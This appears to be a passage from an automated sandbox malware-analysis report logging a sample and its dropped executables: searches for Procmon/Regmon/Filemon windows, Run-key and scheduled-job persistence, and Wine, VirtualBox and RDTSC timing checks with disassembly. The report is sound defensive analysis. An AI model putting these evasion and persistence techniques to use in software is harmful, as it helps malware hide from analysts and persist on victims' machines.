Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: Regmonclass
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ea2c7beae0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ea2c7beae0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6a8d4317d4.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6a8d4317d4.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\1000350002\6a8d4317d4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\1000350002\6a8d4317d4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\1000350002\6a8d4317d4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 82EFE0 second address: 82E87C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F97B4EC49C4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 nop 0x00000012 stc 0x00000013 push dword ptr [ebp+122D0C8Dh] 0x00000019 mov dword ptr [ebp+122D2716h], edi 0x0000001f call dword ptr [ebp+122D1C25h] 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D2716h], edx 0x0000002c xor eax, eax 0x0000002e jmp 00007F97B4EC49BDh 0x00000033 cmc 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 jng 00007F97B4EC49C0h 0x0000003e mov dword ptr [ebp+122D2AD5h], eax 0x00000044 mov dword ptr [ebp+122D2716h], edi 0x0000004a mov esi, 0000003Ch 0x0000004f jmp 00007F97B4EC49BBh 0x00000054 cld 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 stc 0x0000005a jc 00007F97B4EC49B7h 0x00000060 lodsw 0x00000062 mov dword ptr [ebp+122D2716h], ecx 0x00000068 mov dword ptr [ebp+122D3523h], ecx 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jmp 00007F97B4EC49BBh 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b mov dword ptr [ebp+122D20AFh], edi 0x00000081 push eax 0x00000082 push eax 0x00000083 push edx 0x00000084 jbe 00007F97B4EC49BCh 0x0000008a js 00007F97B4EC49B6h 0x00000090 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9A7F62 second address: 9A7F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9A7F68 second address: 9A7F70 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9A70F0 second address: 9A70FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jns 00007F97B4F2EDC6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AA825 second address: 82E87C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 09CA064Bh 0x00000010 mov edi, dword ptr [ebp+122D2396h] 0x00000016 push dword ptr [ebp+122D0C8Dh] 0x0000001c call dword ptr [ebp+122D1C25h] 0x00000022 pushad 0x00000023 mov dword ptr [ebp+122D2716h], edx 0x00000029 xor eax, eax 0x0000002b jmp 00007F97B4EC49BDh 0x00000030 cmc 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 jng 00007F97B4EC49C0h 0x0000003b mov dword ptr [ebp+122D2AD5h], eax 0x00000041 mov dword ptr [ebp+122D2716h], edi 0x00000047 mov esi, 0000003Ch 0x0000004c jmp 00007F97B4EC49BBh 0x00000051 cld 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 stc 0x00000057 jc 00007F97B4EC49B7h 0x0000005d lodsw 0x0000005f mov dword ptr [ebp+122D2716h], ecx 0x00000065 mov dword ptr [ebp+122D3523h], ecx 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f jmp 00007F97B4EC49BBh 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 mov dword ptr [ebp+122D20AFh], edi 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 jbe 00007F97B4EC49BCh 0x00000087 js 00007F97B4EC49B6h 0x0000008d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AA9A0 second address: 9AA9BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b jnl 00007F97B4F2EDCCh 0x00000011 pop eax 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAA82 second address: 9AAA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAA88 second address: 9AAA8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAA8D second address: 9AAA93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAA93 second address: 9AAAF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jc 00007F97B4F2EDCCh 0x00000010 pop ebx 0x00000011 nop 0x00000012 jno 00007F97B4F2EDCBh 0x00000018 xor si, FDE6h 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D23FEh], edi 0x00000025 call 00007F97B4F2EDC9h 0x0000002a jo 00007F97B4F2EDD7h 0x00000030 jmp 00007F97B4F2EDD1h 0x00000035 push eax 0x00000036 js 00007F97B4F2EDD4h 0x0000003c pushad 0x0000003d jns 00007F97B4F2EDC6h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAAF3 second address: 9AAB21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007F97B4EC49BAh 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F97B4EC49C7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAB21 second address: 9AAB2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F97B4F2EDC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAB2B second address: 9AAB2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAB2F second address: 9AAB47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jc 00007F97B4F2EDC6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAB47 second address: 9AAB95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a and edx, 61BAB0E9h 0x00000010 push 00000003h 0x00000012 sub dword ptr [ebp+122D1F1Ch], esi 0x00000018 push 00000000h 0x0000001a mov esi, 5B535E00h 0x0000001f push 00000003h 0x00000021 sbb edi, 66CBB41Eh 0x00000027 push F50B3086h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F97B4EC49C2h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAC32 second address: 9AAC4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4F2EDD6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAC4C second address: 9AAC86 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F97B4EC49B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d cld 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F97B4EC49B8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a push B907AE5Bh 0x0000002f pushad 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAD1F second address: 9AAD35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAD35 second address: 9AAD49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c jnp 00007F97B4EC49B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAD49 second address: 9AAD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F97B4F2EDCFh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAD5F second address: 9AAD81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAD81 second address: 9AAD87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9AAD87 second address: 9AADBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a or dword ptr [ebp+122D1F8Ah], ebx 0x00000010 lea ebx, dword ptr [ebp+1244F75Eh] 0x00000016 movzx esi, dx 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b push eax 0x0000001c pushad 0x0000001d popad 0x0000001e pop eax 0x0000001f pushad 0x00000020 ja 00007F97B4EC49B6h 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9BB8C0 second address: 9BB8C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C9EF9 second address: 9C9F07 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F97B4EC49B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C9F07 second address: 9C9F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4F2EDD7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9A075A second address: 9A075E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C7BE1 second address: 9C7BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C7E76 second address: 9C7EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F97B4EC49CFh 0x0000000d jne 00007F97B4EC49B6h 0x00000013 jmp 00007F97B4EC49C3h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C7EA4 second address: 9C7EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C7EA9 second address: 9C7EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C7EB1 second address: 9C7EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
